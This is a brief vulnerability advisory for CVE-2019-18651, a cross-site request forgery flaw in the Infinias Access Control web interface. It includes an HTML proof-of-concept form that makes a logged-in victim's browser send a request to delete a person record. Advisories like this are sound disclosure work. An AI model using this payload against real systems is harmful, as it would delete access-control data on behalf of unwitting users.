Cross-site request forgery in Infinias Access Control - CVE-2019-18651
Published: November 15, 2019
Infinias Access Control
Detailed vulnerability description
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
PoC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/IntelliM/people/Delete">
<input type="hidden" name="id" value="Numeric_ID" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>